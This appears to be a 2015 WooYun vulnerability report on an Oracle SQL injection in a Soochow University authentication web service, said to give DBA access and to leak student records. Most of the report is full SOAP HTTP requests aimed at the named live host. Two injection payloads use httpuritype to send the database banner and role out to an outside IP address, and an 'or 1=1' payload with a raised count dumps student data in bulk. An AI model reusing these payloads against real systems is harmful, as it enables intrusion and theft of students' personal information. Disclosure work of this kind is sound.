当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0111254

漏洞标题:苏州大学某接口存在oracle注入(DBA权限&大量学生信息泄露)

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2015-05-25 20:56

修复时间:2015-05-30 20:58

公开时间:2015-05-30 20:58

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-25: 细节已通知厂商并且等待厂商处理中
2015-05-30: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

某处接口存在注入.

详细说明:

http://authentication.suda.edu.cn/authentication.asmx?op=getUserName


加单引号报错:

1.png


有waf但可绕过.
Oracle 10g , DBA权限:

POST /authentication.asmx HTTP/1.1
Host: authentication.suda.edu.cn
Content-Type: application/soap+xml; charset=utf-8
Content-Length: 733
<?xml version="1.0" encoding="utf-8"?>
<soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope">
<soap12:Body>
<getUserName xmlns="http://tempuri.org/">
<pref>'or (select cast(substr(httpuritype('http://203.7.28.101:20/'||(select(banner)from v$version where rownum=1)).getclob(),1,1000)as varchar(1000))from dual) is not null)--</pref>
<count>200</count>
</getUserName>
</soap12:Body>
</soap12:Envelope>


POST /authentication.asmx HTTP/1.1
Host: authentication.suda.edu.cn
Content-Type: application/soap+xml; charset=utf-8
Content-Length: 570
<?xml version="1.0" encoding="utf-8"?>
<soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope">
<soap12:Body>
<getUserName xmlns="http://tempuri.org/">
<pref>'or (select cast(substr(httpuritype('http://203.7.28.101:20/'||(select(role)from session_roles where role like 'D%' and rownum=1)).getclob(),1,1000)as varchar(1000))from dual) is not null)--</pref>
<count>200</count>
</getUserName>
</soap12:Body>
</soap12:Envelope>


2.png

漏洞证明:

POST /authentication.asmx HTTP/1.1
Host: authentication.suda.edu.cn
Content-Type: application/soap+xml; charset=utf-8
Content-Length: 390
<?xml version="1.0" encoding="utf-8"?>
<soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope">
<soap12:Body>
<getUserName xmlns="http://tempuri.org/">
<pref>'or 1=1)--</pref>
<count>200</count>
</getUserName>
</soap12:Body>
</soap12:Envelope>


修改count的大小可批量获取学生信息:

3.png

修复方案:

(*_*)

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-05-30 20:58

厂商回复:

最新状态:

暂无